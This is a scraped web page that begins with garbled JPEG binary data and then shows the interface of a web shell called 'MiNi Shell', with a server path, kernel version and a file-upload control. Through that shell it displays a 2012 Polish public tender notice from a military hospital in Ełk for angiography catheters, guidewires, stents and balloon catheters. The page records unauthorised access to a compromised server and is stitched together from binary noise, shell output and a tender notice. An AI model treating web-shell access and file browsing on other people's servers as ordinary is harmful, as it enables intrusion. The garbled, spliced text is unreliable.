JFIF ( %!1!%)+...383-7(-.+  -% &5/------------------------------------------------";!1AQ"aq2#3BRrb*!1"AQa2q#B ?yRd&vGlJwZvK)YrxB#j]ZAT^dpt{[wkWSԋ*QayBbm*&0<|0pfŷM`̬ ^.qR𽬷^EYTFíw<-.j)M-/s yqT'&FKz-([lև<G$wm2*e Z(Y-FVen櫧lҠDwүH4FX1 VsIOqSBۡNzJKzJξcX%vZcFSuMٖ%B ִ##\[%yYꉅ !VĂ1َRI-NsZJLTAPמQ:y״g_g= m֯Ye+Hyje!EcݸࢮSo{׬*h g<@KI$W+W'_> lUs1,o*ʺE.U"N&CTu7_0VyH,q ,)H㲣5<t ;rhnz%ݓz+4 i۸)P6+F>0Tв`&i}Shn?ik܀՟ȧ@mUSLFηh_er i_qt]MYhq 9LaJpPןߘvꀡ\"z[VƬ¤*aZMo=WkpSp \QhMb˒YH=ܒ m`CJt 8oFp]>pP1F>n8(*aڈ.Y݉[iTع JM!x]ԶaJSWҼܩ`yQ`*kE#nNkZKwA_7~ ΁JЍ;-2qRxYk=Uր>Z qThv@.w c{#&@#l;D$kGGvz/7[P+i3nIl`nrbmQi%}rAVPT*SF`{'6RX46PԮp(3W҅U\a*77lq^rT$vs2MU %*ŧ+\uQXVH !4t*Hg"Z챮 JX+RVU+ތ]PiJT XI= iPO=Ia3[ uؙ&2Z@.*SZ (")s8Y/-Fh Oc=@HRlPYp!wr?-dugNLpB1yWHyoP\ѕрiHִ,ِ0aUL.Yy`LSۜ,HZz!JQiVMb{( tژ <)^Qi_`: }8ٱ9_.)a[kSr> ;wWU#M^#ivT܎liH1Qm`cU+!2ɒIX%ֳNړ;ZI$?b$(9f2ZKe㼭qU8I[ U)9!mh1^N0 f_;׆2HFF'4b! yBGH_jтp'?uibQ T#ѬSX5gޒSF64ScjwU`xI]sAM( 5ATH_+s 0^IB++h@_Yjsp0{U@G -:*} TނMH*֔2Q:o@ w5(߰ua+a ~w[3W(дPYrF1E)3XTmIFqT~z*Is*清Wɴa0Qj%{T.ޅ״cz6u6݁h;֦ 8d97ݴ+ޕxзsȁ&LIJT)R0}f }PJdp`_p)əg(ŕtZ 'ϸqU74iZ{=Mhd$L|*UUn &ͶpHYJۋj /@9X?NlܾHYxnuXږAƞ8j ໲݀pQ4;*3iMlZ6w ȵP Shr!ݔDT7/ҡϲigD>jKAX3jv+ ߧز #_=zTm¦>}Tց<|ag{E*ֳ%5zW.Hh~a%j"e4i=vױi8RzM75i֟fEu64\էeo00d H韧rȪz2eulH$tQ>eO$@B /?=#٤ǕPS/·.iP28s4vOuz3zT& >Z2[0+[#Fޑ]!((!>s`rje('|,),y@\pЖE??u˹yWV%8mJ iw:u=-2dTSuGL+m<*צ1as&5su\phƃ qYLֳ>Y(PKi;Uڕp ..!i,54$IUEGLXrUE6m UJC?%4AT]I]F>׹P9+ee"Aid!Wk|tDv/ODc/,o]i"HIHQ_n spv"b}}&I:pȟU-_)Ux$l:fژɕ(I,oxin8*G>ÌKG}Rڀ8Frajٷh !*za]lx%EVRGYZoWѮ昀BXr{[d,t Eq ]lj+ N})0B,e iqT{z+O B2eB89Cڃ9YkZySi@/(W)d^Ufji0cH!hm-wB7C۔֛X$Zo)EF3VZqm)!wUxM49< 3Y .qDfzm |&T"} {*ih&266U9* <_# 7Meiu^h--ZtLSb)DVZH*#5UiVP+aSRIª!p挤c5g#zt@ypH={ {#0d N)qWT kA<Ÿ)/RT8D14y b2^OW,&Bcc[iViVdִCJ'hRh( 1K4#V`pِTw<1{)XPr9Rc 4)Srgto\Yτ~ xd"jO:A!7􋈒+E0%{M'T^`r=E*L7Q]A{]A<5ˋ.}<9_K (QL9FЍsĮC9!rpi T0q!H \@ܩB>F6 4ۺ6΋04ϲ^#>/@tyB]*ĸp6&<џDP9ᗟatM'> b쪗wI!܁V^tN!6=FD܆9*? q6h8  {%WoHoN.l^}"1+uJ ;r& / IɓKH*ǹP-J3+9 25w5IdcWg0n}U@2 #0iv腳z/^ƃOR}IvV2j(tB1){S"B\ ih.IXbƶ:GnI F.^a?>~!k''T[ע93fHlNDH;;sg-@, JOs~Ss^H '"#t=^@'W~Ap'oTڭ{Fن̴1#'c>꜡?F颅B L,2~ת-s2`aHQm:F^j&~*Nūv+{sk$F~ؒ'#kNsٗ D9PqhhkctԷFIo4M=SgIu`F=#}Zi'cu!}+CZI7NuŤIe1XT xC۷hcc7 l?ziY䠩7:E>k0Vxypm?kKNGCΒœap{=i1<6=IOV#WY=SXCޢfxl4[Qe1 hX+^I< tzǟ;jA%n=q@j'JT|na$~BU9؂dzu)m%glwnXL`޹W`AH̸뢙gEu[,'%1pf?tJ Ζmc[\ZyJvn$Hl'<+5[b]v efsЁ ^. &2 yO/8+$ x+zs˧Cޘ'^e fA+ڭsOnĜz,FU%HU&h fGRN擥{N$k}92k`Gn8<ʮsdH01>b{ {+ [k_F@KpkqV~sdy%ϦwK`D!N}N#)x9nw@7y4*\ Η$sR\xts30`O<0m~%U˓5_m ôªs::kB֫.tpv쌷\R)3Vq>ٝj'r-(du @9s5`;iaqoErY${i .Z(Џs^!yCϾ˓JoKbQU{௫e.-r|XWլYkZe0AGluIɦvd7 q -jEfۭt4q +]td_+%A"zM2xlqnVdfU^QaDI?+Vi\ϙLG9r>Y {eHUqp )=sYkt,s1!r,l鄛u#I$-֐2A=A\J]&gXƛ<ns_Q(8˗#)4qY~$'3"'UYcIv s.KO!{, ($LI rDuL_߰ Ci't{2L;\ߵ7@HK.Z)4
Devil Killer Is Here MiNi Shell

MiNi SheLL

Current Path : /proc/self/root/proc/self/root/home/vmanager/www/common/web/tenders/20120529/

Linux 9dbcd5f6333d 5.15.0-124-generic #134-Ubuntu SMP Fri Sep 27 20:20:17 UTC 2024 x86_64
Upload File :
Current File : //proc/self/root/proc/self/root/home/vmanager/www/common/web/tenders/20120529/118317-N-2012.html

<p class="kh_header"><b>Ełk: Dostawa wyrobów medycznych do diagnostyki i zabiegów angiograficznych. Numer sprawy: 22/2012-DZP/PNO.</b><br>
<b>Numer ogłoszenia: 118317 - 2012; data zamieszczenia: 29.05.2012</b><br>
OGŁOSZENIE O ZAMÓWIENIU - dostawy<br><br></p>

<p><b>Zamieszczanie ogłoszenia:</b> obowiązkowe.</p>
<p><b>Ogłoszenie dotyczy:</b> zamówienia publicznego.</p>

<p class="kh_title">SEKCJA I: ZAMAWIAJĄCY</p>

<p><b>I. 1) NAZWA I ADRES:</b> 108 Szpital Wojskowy z Przychodnią SP ZOZ , ul. Kościuszki 30, 19-300 Ełk, woj. warmińsko-mazurskie, tel. 087 6219803, faks 087 6219807.</p>
<ul class="kh_indent_1">
<li><b>Adres strony internetowej zamawiającego:</b> www.108spzoz.elk.pl</li></ul>
<p><b>I. 2) RODZAJ ZAMAWIAJĄCEGO:</b> Samodzielny publiczny zakład opieki zdrowotnej.</p>

<p class="kh_title">SEKCJA II: PRZEDMIOT ZAMÓWIENIA</p>

<p><b>II.1) OKREŚLENIE PRZEDMIOTU ZAMÓWIENIA</b></p>
<p><b>II.1.1) Nazwa nadana zamówieniu przez zamawiającego:</b> Dostawa wyrobów medycznych do diagnostyki i zabiegów angiograficznych. Numer sprawy: 22/2012-DZP/PNO..</p>
<p><b>II.1.2) Rodzaj zamówienia:</b> dostawy.</p>
<p><b>II.1.3) Określenie przedmiotu oraz wielkości lub zakresu zamówienia:</b> Zamówienie obejmuje 5 Zadań.
	Przedmioty dostawy zamieszczone w ofercie powinny posiadać dokładny i czytelny opis przedmiotu zamówienia na opakowaniu oraz stosowne certyfikaty lub atesty dopuszczające 
ich stosowanie w służbie zdrowia zgodnie z polskim prawem oraz prawem Unii Europejskiej (powinny odpowiadać określonym normom lub specyfikacjom technicznym, posiadać aktualne świadectwo dopuszczenia do obrotu oferowanych środków wymagane prawem).
	Przedmioty dostawy zamieszczone w ofercie powinny być bezpieczne w użyciu dla pacjentów oraz dla personelu.
	Oznakowanie dostarczonych wyrobów, instrukcje użytkowania, opis wyrobu, etykiety (oryginalne) muszą być sporządzone w języku polskim.

	Zamawiający zastrzega sobie prawo zakupu mniejszych ilości towaru niż podane 
w Załączniku Nr 2.

	Jeżeli w opisie przedmiotu zamówienia znajdują się jakiekolwiek znaki towarowe, patent czy pochodzenie - należy przyjąć, że Zamawiający podał taki opis ze wskazaniem na typ 
i dopuszcza składanie ofert równoważnych o parametrach techniczno /eksploatacyjno / użytkowych nie gorszych niż , podane w opisie przedmiotu zamówienia. Podstawa prawna: art. 29 ust. 3 Ustawy Prawo Zamówień Publicznych.

ZADANIE Nr 1
Lp.	Opis przedmiotu zamówienia	J.m.	Ilość
1	Cewniki kalibrowane:
1.	Średnica 5 F 
2.	Typ: Pigtail 
3.	Cieniujące 1 cm odcinki o kontrastującej przezierności, znaczniki na dł. 20 cm  
4.	Cewnik o litej strukturze zewnętrznej, nie posiada zewnętrznych znaczników lub opasek
5.	Końcówka cewnika wyraźnie widoczna w skopii 
6.	Długości 110 cm 
7.	Akceptuje prowadnik 0,035	szt.	20
2	Cewniki angiograficzne diagnostyczne do badań naczyniowych:
1.	Końcówka cewnika stabilna i atraumatyczna (wysmuklona), wyprofilowana tak by umożliwiała wybiórcze kaniulowanie tętnic
2.	Typy ukształtowania końcówki: Renal, Newton, Multipurpose, Simmons, J-Curve, Cobra , DAV , MAN , VANSCHIE , TIPS , VSC , VS  VTK ,RIM , MIK. Minimum 40 rodzajów specjalistycznych zakończeń cewnika 
3.	Cewnik nylonowy zbrojony
4.	Marker na końcu cewnika - BICON TIP , widoczna w RTG końcówka cewnika
5.	Długość cewnika 45 do 125 cm 
6.	Dobra sterowalność 1:1
7.	Średnica zewnętrzna 4F lub 4,1F, 5F, 6F 	szt.	30
3	Prowadniki specjalistyczne o najwyższej sztywności
1.	Prowadnik zbudowany z litego drutu stalowego o najwyższym stopniu sztywności i ultrasztywny o spiralnej zewnętrznej strukturze z rdzeniem stalowym.
2.	Pokrycie teflonowe 
3.	Średnica 0,035 i 0,038
4.	Długości 180, 260, 300  cm 
5.	Bezpieczna spiralna końcówka o kształcie typu prostym LES , zagiętym 7- LES, podwójnym zagięciu do łuku aorty LESDC, AUS
szt.	40
4	Koszulki interwencyjne 
1.	średnica 5F do 22 F, zbrojone, pokryte powłoką hydrofilną
2.	długość 45 do 90 cm 
3.	końcówki typu: Balkin, HNL, Rabbe 
4.	znacznik RTG na końcówce	szt.	10




1	Wykonawca zobowiązany jest do utworzenia na terenie siedziby zamawiającego banku, uzupełniane banku następować będzie na bieżąco na podstawie protokołu zużycia. w  banku muszą znajdować się co najmniej trzy komplety każdej pozycji niniejszego formularza cenowego, z obowiązkiem  uzupełnienia ich w ciągu trzech dni roboczych.
2	Wyroby stanowiące asortyment banku zostaną przekazane przez wykonawcę protokołem przyjęcia / przekazania do apteki zakładowej zamawiającego z dołączonym wykazem pozycji asortymentowych pozostawionych w depozyt bankowy w terminie do 7 dni licząc od dnia podpisania umowy.
3	Wykonawca zobowiązany jest dostarczyć strony katalogowe z opisami technicznymi oferowanych przedmiotów zamówienia w momencie tworzenia banku.
4	Zamawiający po otwarciu ofert może przesłać do wykonawców wykaz żądanych próbek z podaniem terminu ich dostarczenia
5	Zamawiający nie dopuszcza składania ofert na poszczególne pozycje asortymentowe w ramach jednego zadania
6	Zamawiający wymaga zapewnienia szkolenia personelu w zakresie technik operacyjnych z zastosowaniem zamawianych wyrobów udokumentowane certyfikatem i punktami szkoleniowymi



ZADANIE Nr 2
Lp.	Opis przedmiotu zamówienia	J.m.	Ilość
1	Cewnik wspomagający udrożnienie tętnic obwodowych
1.	długości cewnika: 65cm, 90cm, 135cm, 150cm
2.	kompatybilność cewnika z prowadnikiem 0.014 dla długości cewnika 135cm i 150cm
3.	kompatybilność cewnika z prowadnikiem 0.018 dla długości cewnika 90cm, 135cm i 150cm
4.	kompatybilność cewnika z prowadnikiem 0.035 dla długości cewnika 65cm, 90cm, 135cm, 150cm
5.	taperowana końcówka cewnika: tip entry profile 0.038
6.	system znakowania co 1cm, aż do 30cm dla ułatwienia pomiaru zmiany (widoczny w skopii)
7.	cewnik z powłoką hydrofilna na odcinku 40cm
8.	cewnik taperowany
9.	cewnik kompatybilny z introduktorem 5F
10.	cewnik w systemie OTW
11.	przez cewnik można podać kontrast, sól fizjologiczną; służy także do wymiany prowadników w trakcie zabiegu	szt.	15

1	Wykonawca zobowiązany jest do utworzenia na terenie siedziby zamawiającego banku, uzupełniane banku następować będzie na bieżąco na podstawie protokołu zużycia. w  banku muszą znajdować się co najmniej trzy komplety każdej pozycji niniejszego formularza cenowego, z obowiązkiem  uzupełnienia ich w ciągu trzech dni roboczych.
2	Wyroby stanowiące asortyment banku zostaną przekazane przez wykonawcę protokołem przyjęcia / przekazania do apteki zakładowej zamawiającego z dołączonym wykazem pozycji asortymentowych pozostawionych w depozyt bankowy w terminie do 7 dni licząc od dnia podpisania umowy.
3	Wykonawca zobowiązany jest dostarczyć strony katalogowe z opisami technicznymi oferowanych przedmiotów zamówienia w momencie tworzenia banku.
4	Zamawiający po otwarciu ofert może przesłać do wykonawców wykaz żądanych próbek z podaniem terminu ich dostarczenia
5	Zamawiający nie dopuszcza składania ofert na poszczególne pozycje asortymentowe w ramach jednego zadania
6	Zamawiający wymaga zapewnienia szkolenia personelu  w zakresie technik operacyjnych z zastosowaniem zamawianych wyrobów udokumentowane certyfikatem i punktami szkoleniowymi



ZADANIE Nr 3
Lp.	Opis przedmiotu zamówienia	J.m.	Ilość
1	Kateter do angiografii:
1.	Końcówka prosta z 8 otworami rozmieszczonymi spiralnie co 90°
2.	Średnica 4F, 5F, 6F, 7F
3.	Długość 70 i 110 cm	szt.	40
2	Kateter do angiografii:
1.	Końcówka pigtail z 8 otworami
2.	Średnica 4F, 5F, 6F, 7F
3.	Długość 70 i 110 cm	szt.	20
3	Zestaw do wprowadzania i wymiany cewników:
1.	Koszulka naczyniowa z zastawką   hemostatyczną i bocznym portem od 4F do 12F
2.	Długości 11 i 23 cm
3.	W zestawie igła do nakłucia naczynia 18G/70 mm,  prowadnik J, dilatator	szt.	80
4	Strzykawka wysokociśnieniowa:
1.	Ciśnienie maksymalne nie mniejsze niż 30 atm.
2.	Pojemność 30 ml
3.	Zaopatrzona w przedłużacz wysokociśnieniowy, zbrojony, z obrotową końcówką  luer-lock, z kranikiem trójdrożnym	szt.	20
5	Przedłużacz wysokociśnieniowy z obrotową końcówką luer-lock:
1.	Długość 150 cm,
2.	Zbrojony, wytrzymujący ciśnienie do 1450 PSI	szt.	50


1	Wykonawca zobowiązany jest do utworzenia na terenie siedziby zamawiającego banku, uzupełniane banku następować będzie na bieżąco na podstawie protokołu zużycia. w  banku muszą znajdować się co najmniej trzy komplety każdej pozycji niniejszego formularza cenowego, z obowiązkiem  uzupełnienia ich w ciągu trzech dni roboczych.
2	Wyroby stanowiące asortyment banku zostaną przekazane przez wykonawcę protokołem przyjęcia / przekazania do apteki zakładowej zamawiającego z dołączonym wykazem pozycji asortymentowych pozostawionych w depozyt bankowy w terminie do 7 dni licząc od dnia podpisania umowy.
3	Wykonawca zobowiązany jest dostarczyć strony katalogowe z opisami technicznymi oferowanych przedmiotów zamówienia w momencie tworzenia banku.
4	Zamawiający po otwarciu ofert może przesłać do wykonawców wykaz żądanych próbek z podaniem terminu ich dostarczenia
5	Zamawiający nie dopuszcza składania ofert na poszczególne pozycje asortymentowe w ramach jednego zadania
6	Zamawiający wymaga zapewnienia szkolenia personelu  w zakresie technik operacyjnych z zastosowaniem zamawianych wyrobów udokumentowane certyfikatem i punktami szkoleniowymi.


ZADANIE Nr 4
Lp.	Opis przedmiotu zamówienia	J.m.	Ilość
1	Prowadniki diagnostyczne

1.	zbudowane z rdzenia nitynolowego, pokryte PTFE i śliską powłoką hydrofilną 
2.	sztywności standardowej
3.	długości  120, 150 i 180 cm
4.	średnicach 0,018, 0,025, 0,032, 0,035, 0,038 
5.	ze stożkowaną końcówką długości 30 mm, prostą i zagiętą
PONADTO:
-prowadniki o średnicy 0,035 dostępne również z końcówką o długości 10, 50, 80 mm
-prowadniki o średnicy 0,035 dostępne również z podwójnym zagięciem końcówki
-prowadniki o średnicy 0,035 i długości: 150, 180 cm dostępne również z końcówką kształtowalną tzw. Shapeable tip (prostą lub zagiętą)
-prowadniki o średnicy 0,038 dostępne również z końcówką o długości 10 mm	szt.	55
2	Cewniki angiograficzne diagnostyczne do badań naczyniowych:
1.	Końcówka cewnika stabilna i atraumatyczna (wysmuklona), wyprofilowana tak by umożliwiała wybiórcze kaniulowanie tętnic
2.	Typy ukształtowania końcówki: Renal, Newton, Multipurpose, Simmons, J-Curve, Cobra , DAV , MAN , VANSCHIE , TIPS , VSC , VS  VTK ,RIM , MIK. Minimum 40 rodzajów specjalistycznych zakończeń cewnika 
3.	Cewnik nylonowy zbrojony
4.	Marker na końcu cewnika - BICON TIP , widoczna w RTG końcówka cewnika
5.	Długość cewnika 45 do 125 cm 
6.	Dobra sterowalność 1:1
7.	Średnica zewnętrzna 4F lub 4,1F, 5F, 6F 	szt.	15


1	Wykonawca zobowiązany jest do utworzenia na terenie siedziby zamawiającego banku, uzupełniane banku następować będzie na bieżąco na podstawie protokołu zużycia. w  banku muszą znajdować się co najmniej trzy komplety każdej pozycji niniejszego formularza cenowego, z obowiązkiem  uzupełnienia ich w ciągu trzech dni roboczych.
2	Wyroby stanowiące asortyment banku zostaną przekazane przez wykonawcę protokołem przyjęcia / przekazania do apteki zakładowej zamawiającego z dołączonym wykazem pozycji asortymentowych pozostawionych w depozyt bankowy w terminie do 7 dni licząc od dnia podpisania umowy.
3	Wykonawca zobowiązany jest dostarczyć strony katalogowe z opisami technicznymi oferowanych przedmiotów zamówienia w momencie tworzenia banku.
4	Zamawiający po otwarciu ofert może przesłać do wykonawców wykaz żądanych próbek z podaniem terminu ich dostarczenia
5	Zamawiający nie dopuszcza składania ofert na poszczególne pozycje asortymentowe w ramach jednego zadania
6	Zamawiający wymaga zapewnienia szkolenia personelu  w zakresie technik operacyjnych z zastosowaniem zamawianych wyrobów udokumentowane certyfikatem i punktami szkoleniowymi


ZADANIE Nr 5
Lp.	Opis przedmiotu zamówienia	J.m.	Ilość
1	Stent rozprężany na balonie:
1.	stent kobaltowo-chromowy typu sloted tube
2.	kompatybilny z prowadnikiem 0,035
3.	grubość ściany stentu nie większa niż 0,063
4.	dł. układu wprowadzającego 80 i 135 cm
5.	dostępne średnice od 4,0 do 10,0 mm
6.	dostępne  długości stentu od 12 do 59 mm
7.	wszystkie rozmiary kompatybilne z  introduktorem 6F
8.	stent wskazany w leczeniu nowo powstałych lub restenotycznych zwężeń miażdżycowych 	szt.	15
2	Stenty samorozprężalne do t. udowej powierzchownej
1.	stent nitylonowy z termiczną pamięcią kształtu
2.	kompatybilny z prowadnikiem 0,035
3.	możliwość zastosowania introducera 6F i  cewnika prowadzącego 8F dla wszystkich rozmiarów
4.	długość układu wprowadzającego 80  i 135cm
5.	dostępne średnice od 5 do 10mm
6.	dostępne długości od 20 do 100mm i dodatkowo 120 i 150 mm dla średnic w zakresie 5-8 mm
7.	mechanizm uwalniania stentu  możliwy  do obsługi jedna ręką	szt.	30
3	Stent samorozprężalny do t. poniżej kolana
1.	stent nitylonowy z termiczną pamięcią kształtu
2.	kompatybilny z prowadnikiem 0,018
3.	możliwość zastosowania introducera 4F 
4.	długość układu wprowadzającego 80-90cm i 120-135cm
5.	dostępne średnice od 3 do 8mm
6.	dostępne długości od 20 do 100 mm
7.	stent wskazany w leczeniu nowo powstałych lub restenotycznych zwężeń miażdżycowych 	szt. 	5
4	Cewnik balonowy wysokociśnieniowy
1.	pokrycie  ułatwiające manewrowanie w wąskich i krętych naczyniach
2.	materiał balonu  odporny na zadrapania i uszkodzenia podczas przechodzenia przez zwapniałe ciasne zmiany
3.	kompatybilne z prowadnikiem  0,035
4.	dostępne średnice od 3 do 14 mm
5.	długości 20 - 250 mm (200 mm dostępne dla średnicy 4 - 6 mm; 250 mm dostępne dla a śr. 4 - 6) mm 
6.	długość układu wprowadzającego 80 i 135 cm  (50 cm dla balonów o śr. 5 - 7 mm i dł. 20, 40 mm) 
7.	możliwość zastosowania introduktora 5 - 7 F w zależności od rozmiaru 
8.	ciśnienie nominalne 4 - 10 ATM w zależności od rozmiaru
9.	RBP 7 - 28 ATM w zależności od rozmiaru	szt. 	60
5	Cewnik balonowy wysokociśnieniowy
1.	pokrycie  ułatwiające manewrowanie w wąskich i krętych naczyniach
2.	materiał balonu  odporny na zadrapania i uszkodzenia podczas przechodzenia przez zwapniałe ciasne zmiany
3.	kompatybilne z prowadnikiem  0,018
4.	RBP =/> 20 bar
5.	dostępne długości 20 - 120mm 
6.	dostępne śr.2,0 - 4,0mm i 5,0mm dla dł. 20-60 mm
7.	długość układu dostarczającego 90 i 135-150cm
8.	shaft proksymalny 3,6F
9.	shaft dystalny 3,4F	 szt.	5
6	Cewnik balonowy wysokociśnieniowy do interwencji poniżej kolana
1.	balon w systemie OTW, kompatybilny z prowadnikiem 0,014
2.	system kompatybilny z introducerem 4F dla wszystkich rozmiarów
3.	dł. systemu 90 i 150cm
4.	NP = 8atm; RBP = 14atm
5.	dostępne średnice od 1,5 do 4mm (dla średnicy 1,5mm dostępne min. 4długości)
6.	wymagane długości: 20, 40, 60, 80, 120 i 200mm
7.	pokrycie  ułatwiające manewrowanie w wąskich i krętych naczyniach
8.	materiał balonu  odporny na zadrapania i uszkodzenia podczas przechodzenia przez zwapniałe ciasne zmiany	 szt.	10
7	Prowadniki zabiegowe
1.	sterowalny prowadnik zabiegowy o średnicy 0,035 z taperowaną końcówką 0,025 o długości 17cm
2.	długość prowadnika od min 180 do min 300 cm z powłoką ułatwiającą przejście przez zwężone tętnice
3.	dostępne również  prowadniki 0,014; 0,018 o dł. 190 i 300 cm	szt.	10
8	Systemy zamykające do naczyń
1.	do  wyboru systemy  szewne i  na zasadzie nitynolowego klipsa	szt.	15


1	Wykonawca zobowiązany jest do utworzenia na terenie siedziby zamawiającego banku, uzupełniane banku następować będzie na bieżąco na podstawie protokołu zużycia. w  banku muszą znajdować się co najmniej trzy komplety każdej pozycji niniejszego formularza cenowego, z obowiązkiem  uzupełnienia ich w ciągu trzech dni roboczych.
2	Wyroby stanowiące asortyment banku zostaną przekazane przez wykonawcę protokołem przyjęcia / przekazania do apteki zakładowej zamawiającego z dołączonym wykazem pozycji asortymentowych pozostawionych w depozyt bankowy w terminie do 7 dni licząc od dnia podpisania umowy.
3	Wykonawca zobowiązany jest dostarczyć strony katalogowe z opisami technicznymi oferowanych przedmiotów zamówienia w momencie tworzenia banku.
4	Zamawiający po otwarciu ofert może przesłać do wykonawców wykaz żądanych próbek z podaniem terminu ich dostarczenia
5	Zamawiający nie dopuszcza składania ofert na poszczególne pozycje asortymentowe w ramach jednego zadania
6	Zamawiający wymaga zapewnienia szkolenia personelu  w zakresie technik operacyjnych z zastosowaniem zamawianych wyrobów udokumentowane certyfikatem i punktami szkoleniowymi.</p>
<p><b>II.1.4) Czy przewiduje się udzielenie zamówień uzupełniających:</b> nie.</p>

<p><b>II.1.5) Wspólny Słownik Zamówień (CPV):</b> 33.14.00.00-3, 33.11.17.10-1.</p>
<p><b>II.1.6) Czy dopuszcza się złożenie oferty częściowej:</b> tak, liczba części: 5.</p>
<p><b>II.1.7) Czy dopuszcza się złożenie oferty wariantowej:</b> nie.</p><br>
<p><b>II.2) CZAS TRWANIA ZAMÓWIENIA LUB TERMIN WYKONANIA:</b> Okres w miesiącach: 12.</p>

<p class="kh_title">SEKCJA III: INFORMACJE O CHARAKTERZE PRAWNYM, EKONOMICZNYM, FINANSOWYM I TECHNICZNYM</p>

<p><b>III.1) WADIUM</b></p>
<p><b>Informacja na temat wadium:</b> Zamawiający nie wymaga wniesienia wadium</p>
<p><b>III.2) ZALICZKI</b></p>
<ul class="kh_indent_1"><li><b>Czy przewiduje się udzielenie zaliczek na poczet wykonania zamówienia:</b> nie</li></ul>

<p><b>III.4) INFORMACJA O OŚWIADCZENIACH LUB DOKUMENTACH, JAKIE MAJĄ DOSTARCZYĆ WYKONAWCY W CELU POTWIERDZENIA SPEŁNIANIA WARUNKÓW UDZIAŁU W POSTĘPOWANIU ORAZ NIEPODLEGANIA WYKLUCZENIU NA PODSTAWIE ART. 24 UST. 1 USTAWY</b></p>
<ul class="kh_indent_1"><li>
<p><b>III.4.1) W zakresie wykazania spełniania przez wykonawcę warunków, o których mowa w art. 22 ust. 1 ustawy, oprócz oświadczenia o spełnieniu warunków udziału w postępowaniu, należy przedłożyć:</b></p>
</li>

<li><p><b>III.4.2) W zakresie potwierdzenia niepodlegania wykluczeniu na podstawie art. 24 ust. 1 ustawy, należy przedłożyć:</b></p>

<ul style="text-align: justify; margin-right: 20px; list-style: disc"><li style="margin-bottom: 12px;">oświadczenie o braku podstaw do wykluczenia</li>

<li style="margin-bottom: 12px;">aktualny odpis z właściwego rejestru, jeżeli odrębne przepisy wymagają wpisu do rejestru, w celu wykazania braku podstaw do wykluczenia w oparciu o art. 24 ust. 1 pkt 2 ustawy, wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert, a w stosunku do osób fizycznych oświadczenie w zakresie art. 24 ust. 1 pkt 2 ustawy</li>

</ul></li>
<li>
<p class="bold">III.4.3) Dokumenty podmiotów zagranicznych</p>
<p class="bold">Jeżeli wykonawca ma siedzibę lub miejsce zamieszkania poza terytorium Rzeczypospolitej Polskiej, przedkłada:</p>
<p class="bold">III.4.3.1)  dokument wystawiony w kraju, w którym ma siedzibę lub miejsce zamieszkania potwierdzający, że:</p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">
<li style="margin-bottom: 12px;">nie otwarto jego likwidacji ani nie ogłoszono upadłości - wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert</li>

</ul></li>
</ul>
<br><p class="bold">

III.5) INFORMACJA O DOKUMENTACH POTWIERDZAJĄCYCH, ŻE OFEROWANE DOSTAWY , USŁUGI LUB ROBOTY BUDOWLANE ODPOWIADAJĄ OKREŚLONYM WYMAGANIOM</p>
<p class="bold">W zakresie potwierdzenia, że oferowane dostawy, usługi lub roboty budowlane odpowiadają określonym wymaganiom należy przedłożyć:</p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc">
<li style="margin-bottom: 12px;"><p style="margin: 0px; padding: 0px;">inne dokumenty</p>
<p style="margin: 0px; padding: 0px;">Aktualne dokumenty dopuszczające do obrotu i używania na terenie RP asortyment objęty zamówieniem, dla którego jest to wymagane, zgodnie z ustawą o wyrobach medycznych z dn. 
20 maja 2010 r. (Dz. U. z 2010 r. Nr 107, poz. 679) oraz innymi obowiązującymi przepisami prawa w tym zakresie: deklarację zgodności CE, wpis lub zgłoszenie do rejestru wyrobów medycznych; NA DOŁĄCZONYM DOKUMENCIE W PRAWYM GÓRNYM ROGU NALEŻY WPISAĆ NUMER ZADANIA I POZYCJI PRZEDMIOTU ZAMÓWIENIU.</p></li>



</ul><p class="bold">III.6) INNE DOKUMENTY</p>
<p class="bold">Inne dokumenty niewymienione w pkt III.4) albo w pkt III.5)</p>
<p>Formularz ofertowy, Formularze cenowe Zadanie Nr 1 - Nr 5,  Oświadczenie o spełnieniu warunków udziału w postępowaniu z art. 22 ust. 1 Prawa zamówień publicznych</p>
<p><b>III.7) Czy ogranicza się możliwość ubiegania się o zamówienie publiczne tylko dla wykonawców, u których ponad 50 % pracowników stanowią osoby niepełnosprawne: </b>nie</p>


<p class="kh_title">SEKCJA IV: PROCEDURA</p>
<p><b>IV.1) TRYB UDZIELENIA ZAMÓWIENIA</b></p>
<p><b>IV.1.1) Tryb udzielenia zamówienia:</b> przetarg nieograniczony.</p>

<p><b>IV.2) KRYTERIA OCENY OFERT</b></p>
<p><b>IV.2.1) Kryteria oceny ofert: </b>najniższa cena.</p>
<p><b>IV.2.2) Czy przeprowadzona będzie aukcja elektroniczna:</b> nie.</p>
<p><b>IV.3) ZMIANA UMOWY</b></p>
<p><b>Czy przewiduje się istotne zmiany postanowień zawartej umowy w stosunku do treści oferty, na podstawie której dokonano wyboru wykonawcy: </b>tak</p>
<p><b>Dopuszczalne zmiany postanowień umowy oraz określenie warunków zmian</b></p>
<p>Zamawiający przewiduje możliwość dokonania zmian postanowień zawartej umowy w stosunku do treści oferty, na podstawie której dokonano wyboru Wykonawcy, z zastrzeżeniem postanowień w art. 144 ust. 1 Ustawy Prawo Zamówień Publicznych:
1.	Ceny jednostkowe mogą ulec zmianie wyłącznie na  skutek: zaistnienia  możliwości obniżenia cen.
2.	W przypadku wystąpienia konieczności wprowadzenia zmian spowodowanych następującymi  okolicznościami: siła wyższa uniemożliwiająca wykonanie przedmiotu umowy zgodnie ze szczegółowym opisem przedmiotu zamówienia, zmiany dotyczące danych obydwu stron umowy w tym zmiana osoby reprezentującej, zmiany teleadresowe,  zmiany w nazwie firmy, zmiany rachunku bankowego, itp.
3.	zmiana wielości opakowania nie powodująca zmiany ogólnej ilości (sztuk) objętego przedmiotową umową oraz nie powodująca zmiany ceny 
4.	Zamawiający w trakcie realizacji umowy może dokonać przesunięć ilościowych asortymentu, według bieżących potrzeb i celowości zakupu, przy czym ogólna wartość przedmiotu zamówienia nie przekroczy kwoty zapisanej w umowie.  
5.	Zamawiający dopuszcza zmianę ceny w przypadku zmiany przepisów prawa podatkowego w okresie obowiązywania umowy dotyczących stawek VAT, przy czym zmiana nastąpi w wartości brutto, wartość netto pozostaje bez zmian 
